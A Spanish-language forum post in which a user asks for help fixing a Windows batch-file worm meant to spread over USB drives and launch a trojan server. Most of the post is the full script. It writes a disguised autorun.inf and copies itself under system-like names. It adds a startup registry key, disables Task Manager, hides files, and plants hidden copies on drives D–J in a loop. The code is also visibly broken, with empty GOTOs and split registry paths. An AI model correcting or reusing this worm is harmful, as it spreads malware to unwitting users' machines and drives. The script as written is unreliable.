Autor
hola
me podrian ehcar una manito con este code en batch
es un worm que se propaga por las usb e instala el server de un troyano
pero lo eh probado y no funciona (compilado a exe y todo con el quick batch file compiler)
me podrian corregir los errores porfavor
al server del troyano de puse "server_8.exe"
porciakaso el codigo no es mio
aki va:
@ECHO OFF
SET WORMORIGINAL=juego.exe
SET WORM=1044404.EXE
SET AUTORUNORIGINA L=%WINDIR%\14785\WINUPDATE.DLL
SET AUTORUN=autorun.inf
MD "%WINDIR%\14785"
ECHO [AUTORUN] >%%WINDIR%\14785\WINUPDATE.DLL%
ECHO open=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL%
ECHO shell\1=abrir >>%%WINDIR%\14785\WINUPDATE.DLL%
ECHO shell\1\Command=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL%
ECHO shell\2\=explorar >>%%WINDIR%\14785\WINUPDATE.DLL%
ECHO shell\2\Command=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL%
ECHO shellexecute=%1044404.EXE% >>%%WINDIR%\14785\WINUPDATE.DLL%
COPY %juego.exe% "%WINDIR%\14785\SYSTEMSHELL.exe"
START %MYFILES%\server8.exe
REG ADD HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v wuaclt.exe /t REG_SZ /d "%WINDIR%\14785\SYSTEMSHELL.exe" /f
REG ADD HKEY_CURRENT_U SER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d
REG ADD HKEY_LOCAL_MAC HINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN /v CheckedValue /t REG_DWORD /d "2" /f
:CHEKARWORM
IF NOT EXIST "D:\%1044404.EXE%" GOTO
IF NOT EXIST "E:\%1044404.EXE" GOTO
IF NOT EXIST "F:\%1044404.EXE" GOTO
IF NOT EXIST "G:\%1044404.EXE%" GOTO
IF NOT EXIST "H:\%1044404.EXE%" GOTO
IF NOT EXIST "I:\%1044404.EXE%" GOTO
IF NOT EXIST "J:\%1044404.EXE%" GOTO
:COPIARWORM
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "E:\%1044404.EXE%"
ATTRIB +S +H +R "E:\%1044404.EXE%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "F:\%1044404.EXE%"
ATTRIB +S +H +R "F:\%1044404.EXE%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "G:\%1044404.EXE%"
ATTRIB +S +H +R "G:\%1044404.EXE%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "H:\%1044404.EXE%"
ATTRIB +S +H +R "H:\%1044404.EXE%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "I:\%1044404.EXE%"
ATTRIB +S +H +R "I:\%1044404.EXE%"
COPY "%WINDIR%\14785\SYSTEMSHELL.exe" "J:\%1044404.EXE%"
ATTRIB +S +H +R "J:\%1044404.EXE%"
COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "E:\%autorun.inf%"
ATTRIB +S +H +R "E:\%autorun.inf%"
COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "F:\%autorun.inf%"
ATTRIB +S +H +R "F:\%autorun.inf%"
COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "G:\%autorun.inf%"
ATTRIB +S +H +R "G:\%autorun.inf%"
COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "H:\%autorun.inf%"
ATTRIB +S +H +R "H:\%autorun.inf%"
COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "I:\%autorun.inf%"
ATTRIB +S +H +R "I:\%autorun.inf%"
COPY "%%WINDIR%\14785\WINUPDATE.DLL%" "J:\%autorun.inf%"
ATTRIB +S +H +R "J:\%autorun.inf%"
GOTO LOOP
:LOOP
ping 127.0.0.1 -n 60
GOTO CHEKARWORM
Bueno espero su ayuda
saludos!
|
 |
Bienvenido(a), Visitante. Por favor Ingresar o Registrarse ¿Perdiste tu email de activación?. |
En línea
